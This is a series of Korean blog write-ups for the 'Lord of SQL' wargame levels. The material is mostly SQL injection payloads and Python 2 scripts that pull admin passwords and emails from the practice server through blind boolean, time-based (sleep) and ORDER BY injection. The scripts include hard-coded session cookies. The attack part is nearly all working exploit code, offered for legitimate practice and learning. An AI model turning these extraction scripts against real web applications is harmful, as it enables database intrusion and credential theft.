
LOS2 ouroboros

Wargame/Lord of SQL 2018. 10. 10. 09:57

payload

' UNION SELECT REPLACE(REPLACE('" UNION SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS id-- x',CHAR(34),CHAR(39)),CHAR(36),'" UNION SELECT REPLACE(REPLACE("$",CHAR(34),CHAR(39)),CHAR(36),"$") AS id-- x') AS id-- x




LOS2 phantom

Wargame/Lord of SQL 2018. 10. 10. 09:50
import requests
import time

def request(payload):
    """Issue one GET with *payload* in ``joinmail`` and return the round-trip time in seconds.

    The response body is discarded: callers only compare the returned latency
    against a threshold. ``requests.get`` is called without a ``timeout``, so a
    stalled connection blocks indefinitely. The ``PHPSESSID`` value below is a
    session secret hard-coded in source.
    """
    started = time.time()
    target = "http://los.rubiya.kr/phantom_e2e30eaf1c0b3cb61b4b72a932c849fe.php"
    query = {'joinmail': payload}
    cookie_header = {'Cookie': 'PHPSESSID=84u3mb02noqq3j7t40iv2roqc7'}
    requests.get(target, params=query, headers=cookie_header)
    return time.time() - started

# Phase 1: find the length of the target row's email. Each probe wraps the
# comparison in ``if(cond, sleep(1), 1)``, so a round trip longer than one
# second is taken as "length == i". Nothing distinguishes a match from a
# response that is slow for any other reason. ``length`` stays 0 if no i in
# 0..99 trips the threshold, and phase 2 (``range(1, length+1)``) then runs
# zero iterations.
length = 0
for i in range(0,100):
    payload = "1'),(if(length((select a.email from prob_phantom a where a.no=1))="+str(i)+",sleep(1),1),'5','1')-- x"
    if request(payload) > 1:
        length = i
        break

print "Find Admin Email Length[*] = " + str(length)

# Phase 2: recover each character bit by bit. ``bin(ord(...))`` left-padded to
# eight digits is probed one position at a time (j = 1..8, most significant
# bit first); a response slower than one second marks that bit as 1. This
# costs eight requests per character rather than one per candidate value.
admin_email = ""
for i in range(1,length+1):
    binary = ""
    for j in range(1,9):
        payload = "1'),(if(substring(lpad(bin(ord(substring((select a.email from prob_phantom a where a.no=1),"+str(i)+",1))),8,0),"+str(j)+",1)=1,sleep(1),1),'5','1')-- x"
        if request(payload) > 1:
            binary += "1"
        else:
            binary += "0"
    # An all-zero byte means no bit probe was slow; it is skipped rather than
    # appended as NUL. ``int(binary, 2)`` reassembles the code point.
    if binary != "00000000":
        admin_email += chr(int(binary,2))

print "Find Admin Email[*] = " + str(admin_email)


import requests
import time

def request(payload):
    """Issue one GET with *payload* in ``pw`` and report whether ``config.php`` appears in the body.

    Returns True when the marker string is present in the response text and
    False otherwise. No ``timeout`` is set on the request, and the ``PHPSESSID``
    cookie is a session secret hard-coded in source. ``time`` is imported by
    the script but not needed here.
    """
    target = "http://los.rubiya.kr/frankenstein_b5bab23e64777e1756174ad33f14b5db.php"
    query = {'pw': payload}
    cookie_header = {'Cookie': 'PHPSESSID=84u3mb02noqq3j7t40iv2roqc7'}
    body = requests.get(target, params=query, headers=cookie_header).text
    return "config.php" in body

# Candidate alphabet; for each position the characters are tried in this order.
strings = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
admin_pw = ""
# The outer loop caps the recovered length at 99 characters; each inner pass
# extends the known prefix by one character via ``like '<prefix><c>%'``. The
# probe's ``case`` puts ``9e300*9e300`` in the else branch, and ``request``
# reports whether the response mentions ``config.php`` (presumably from an
# error message; verify against the target page).
for i in range(1,100):
    for j in range(0,len(strings)):
        payload = "' or id='admin' and case when pw like '"+admin_pw+strings[j]+"%' then 1 else 9e300*9e300 end-- x "
        if request(payload) == True:
            admin_pw += strings[j]
            break
    # Stop once a full pass over the alphabet produced no match. NOTE: this
    # condition is also true when the match was the alphabet's last character
    # ('Z'), because j is then len(strings)-1 as well, so extraction ends early
    # in that case.
    if j == len(strings)-1:
        break
print "Find Admin Pw[*] = " + admin_pw


import requests
import time

def request(payload):
    """Issue one GET with *payload* in ``id`` and return the round-trip time in seconds.

    Only the latency is returned; the response body is discarded. No
    ``timeout`` is passed to ``requests.get``, so a stalled connection blocks
    indefinitely. The ``PHPSESSID`` value is a session secret hard-coded in
    source.
    """
    started = time.time()
    target = "http://los.rubiya.kr/blue_dragon_23f2e3c81dca66e496c7de2d63b82984.php"
    query = {'id': payload}
    cookie_header = {'Cookie': 'PHPSESSID=84u3mb02noqq3j7t40iv2roqc7'}
    requests.get(target, params=query, headers=cookie_header)
    return time.time() - started

# Phase 1: length of the admin password, probed 0..99. A match runs sleep(3)
# and the threshold is 2.8, leaving 0.2 s of slack below the sleep duration;
# a response that is slow for any other reason still reads as a match.
# ``length`` stays 0 when nothing matches.
length = 0
for i in range(0,100):
    payload = "' or id='admin' and if(length(pw)="+str(i)+",sleep(3),1)-- x"
    if request(payload) > 2.8:
        length = i
        break

print "Find Admin Pw Length[*] = " + str(length)

# Phase 2: for each position, try every printable ASCII code (32..126) with
# one request per candidate until the timing probe matches; the first match is
# appended and the inner loop ends. A position with no match is skipped
# silently, so the printed value can be shorter than ``length``.
admin_pw = ""
for i in range(1,length+1):
    for j in range(32,127):
        payload = "' or id='admin' and if(ascii(substring(pw,"+str(i)+",1))="+str(j)+",sleep(3),1)-- x"
        if request(payload) > 2.8:
            admin_pw += chr(j)
            break
print "Find Admin Pw[*] = " + admin_pw



LOS2 red_dragon

Wargame/Lord of SQL 2018. 10. 10. 09:20
import requests

def request(payload_1,payload_2):
    """Issue one GET with *payload_1* in ``id`` and *payload_2* in ``no``; report whether ``Hello admin`` is in the body.

    Returns True when the marker string is present in the response text and
    False otherwise. No ``timeout`` is set on the request, and the ``PHPSESSID``
    cookie is a session secret hard-coded in source.
    """
    target = "http://los.rubiya.kr/red_dragon_b787de2bfe6bc3454e2391c4e7bb5de8.php"
    query = {'id': payload_1, 'no': payload_2}
    cookie_header = {'Cookie': 'PHPSESSID=fnlt2l775q0o8folhtjp84pqg5'}
    body = requests.get(target, params=query, headers=cookie_header).text
    return "Hello admin" in body

# ``payload_1`` goes into ``id``; ``payload_2`` goes into ``no`` and grows by one
# hex byte per outer pass. Each pass tries candidate bytes 32..127 in ascending
# order and stops at the first one for which ``request`` returns False,
# recording the previous value (i-1). The outer loop ends after 100 bytes, or
# earlier when the inner loop reached i == 127 (whether or not it matched
# there).
payload_1 = "'||pw>#"
payload_2 = "\n0x"
for j in range(0,100):
    for i in range(32,128):
        if request(payload_1,payload_2+hex(i).replace("0x","")) == False:
            payload_2 += hex(i-1).replace("0x","")
            break
    if i == 127:
        break

# ``int(payload_2, 16)`` accepts the leading newline and the ``0x`` prefix. The
# slice drops ``0x`` and the trailing character (presumably the ``L`` suffix of
# a Python 2 long) before decoding the hex digits back to bytes.
# NOTE(review): the +1 is not explained in the source; confirm the printed
# value against a known result before relying on it.
pw = hex(int(payload_2,16)+1)
print "Find Pw[*] = " + pw[2:len(pw)-1].decode("hex").lower()



payload

id=\&pw= union select 0x5c,0x20756e696f6e2073656c6563742030783631363436643639366523#




import requests

def request(payload):
    """Issue one GET with *payload* in ``order`` and report whether the admin row is the first table row.

    Returns True when the literal fragment
    ``h>email</th><th>score</th><tr><td>admin</td`` (table header immediately
    followed by a row for ``admin``) appears in the response text, False
    otherwise. No ``timeout`` is set, and the ``PHPSESSID`` cookie is a session
    secret hard-coded in source.
    """
    target = "http://los.rubiya.kr/evil_wizard_32e3d35835aa4e039348712fb75169ad.php"
    query = {'order': payload}
    cookie_header = {'Cookie': 'PHPSESSID=cjuc8f1iu5f7ooe4ktnrgdv565'}
    body = requests.get(target, params=query, headers=cookie_header).text
    return "h>email</th><th>score</th><tr><td>admin</td" in body

# Phase 1: length of the email, probed 0..99. The expression is sent as the
# ``order`` parameter (presumably used as a sort key) and evaluates to
# ``score`` when the condition holds and to 999 otherwise; ``request`` reports
# whether the admin row ends up first in the rendered table. There is no
# ``break``, so all 100 candidates are sent and the last matching ``i`` wins;
# ``length`` stays 0 with no match.
length = 0
for i in range(0,100):
    payload = "if(score=50 and length(email)="+str(i)+",score,999)"
    if request(payload) == True:
        length = i

print "Find Admin Email Length[*] = " + str(length)

# Phase 2: recover each character bit by bit. ``bin(ord(...))`` left-padded to
# eight digits is probed one position at a time (j = 1..8, most significant
# bit first); a True answer from ``request`` marks that bit as 1. Eight
# requests per character.
admin_email = ""
for i in range(1,length+1):
    binary = ""
    for j in range(1,9):
        payload = "if(score=50 and substring(lpad(bin(ord(substring(email,"+str(i)+",1))),8,0),"+str(j)+",1)=1,score,999)"
        if request(payload) == True:
            binary += "1"
        else:
            binary += "0"
    # An all-zero byte (no bit probe answered True) is skipped rather than
    # appended as NUL.
    if binary != "00000000":
        admin_email += chr(int(binary,2))

print "Find Admin Email[*] = " + str(admin_email)



LOS2 hell_fire

Wargame/Lord of SQL 2018. 10. 10. 09:00
import requests
import time

def request(payload):
    """Issue one GET with *payload* in ``order`` and return the round-trip time in seconds.

    The response body is discarded; callers only compare the latency against a
    threshold. ``requests.get`` is called without a ``timeout``, so a stalled
    connection blocks indefinitely. The ``PHPSESSID`` value is a session secret
    hard-coded in source.
    """
    started = time.time()
    target = "http://los.rubiya.kr/hell_fire_309d5f471fbdd4722d221835380bb805.php"
    query = {'order': payload}
    cookie_header = {'Cookie': 'PHPSESSID=cjuc8f1iu5f7ooe4ktnrgdv565'}
    requests.get(target, params=query, headers=cookie_header)
    return time.time() - started

# Phase 1: length of the email, probed 0..39. A match evaluates sleep(1), and
# a round trip above one second is read as a match; a response slow for any
# other reason is indistinguishable. There is no ``break``, so all 40 probes
# are sent and the last matching ``i`` wins; ``length`` stays 0 with no match.
length = 0
for i in range(0,40):
    payload = "if(score=200 and length(email)="+str(i)+",sleep(1),1)"
    if request(payload) > 1:
        length = i

print "Find Admin Email Length[*] = " + str(length)

# Phase 2: for each position, try every printable ASCII code (32..126), one
# request per candidate, until the timing probe exceeds one second; the first
# match is appended and the inner loop ends. A position with no match is
# skipped silently, so the printed value can be shorter than ``length``.
admin_email = ""
for i in range(1,length+1):
    for j in range(32,127):
        payload = "if(score=200 and ascii(substring(email,"+str(i)+",1))="+str(j)+",sleep(1),1)"
        if request(payload) > 1:
            admin_email += chr(j)
            break
print "Find Admin Email[*] = " + str(admin_email)




풀이 시작 시간 = 2018-02-08 20:39

풀이 종료 시간 = 2018-02-09 00:12

총 풀이 시간 = 3:33

 

All Clear

 

보안 입문하고 일년간 가장 많이한게 웹인데 그래도 다른 분야보다 확실히 이제 슬슬 기본은 갖춰져가고 있는 것 같다. 그리고 워게임 풀 때도 어느정도 시간 생각하면서 푸니 확실히 집중도 더 잘되고 CTF 할 때 도움이 많이 될 것 같다.  



LOS umaru

Wargame/Lord of SQL 2018. 2. 9. 00:09
import urllib2
import time

def request(data):
    """GET the page with *data* URL-quoted into ``flag`` and return the elapsed seconds.

    The response body is read and discarded; callers only use the latency.
    The ``User-Agent`` and ``Cookie`` header values (including the
    ``PHPSESSID``) are hard-coded in source, and ``urlopen`` is called without
    a timeout, so a stalled connection blocks indefinitely.
    """
    t0 = time.time()
    target = ("https://los.eagle-jump.org/umaru_6f977f0504e56eeb72967f35eadbfdf5.php?flag="
              + urllib2.quote(data))
    req = urllib2.Request(target)
    for name, value in (
        ('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
        ('Cookie', '__cfduid=d8ef4b715b1243db43a171dd9c1503f641517927129; PHPSESSID=iaqbaeq8kf93g61qgl0edanf16'),
    ):
        req.add_header(name, value)
    urllib2.urlopen(req).read()
    return time.time() - t0

length = 0
admin_pw = ""
# Candidate alphabet for phase 2, tried in this order for every position.
strings = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!_@"


# Phase 1: length of ``flag``, probed 0..49. A matching length evaluates
# sleep(10), and a round trip above 9 seconds is read as a match; the trailing
# ``or (select 1 union select 2)`` is part of every probe as written. ``length``
# stays 0 when nothing matches, and phase 2 then runs zero iterations.
for i in range(0,50):
    payload = "1 and case when length(flag)="+str(i)+" then sleep(10) else 0 end or (select 1 union select 2)"
    if request(payload)>9:
        length = i
        break

print "[*]Admin Password Length = " + str(length)


# Phase 2: extend the known prefix one character per outer pass using
# ``like '<prefix><c>%'``; a round trip above 9 seconds marks the candidate as
# correct, the partial value is printed, and the inner loop ends. A position
# where no alphabet character matches is skipped silently, so the final value
# can be shorter than ``length``.
for j in range(1,length+1):
    for i in range(0,len(strings)):
        payload = "1 and case when flag like '"+admin_pw+strings[i]+"%' then sleep(10) else 0 end or (select 1 union select 2)"
        if request(payload)>9:
            admin_pw += strings[i]
            print "[-]Admin Password = " + admin_pw
            break

print "[*]Admin Password = " + admin_pw

 
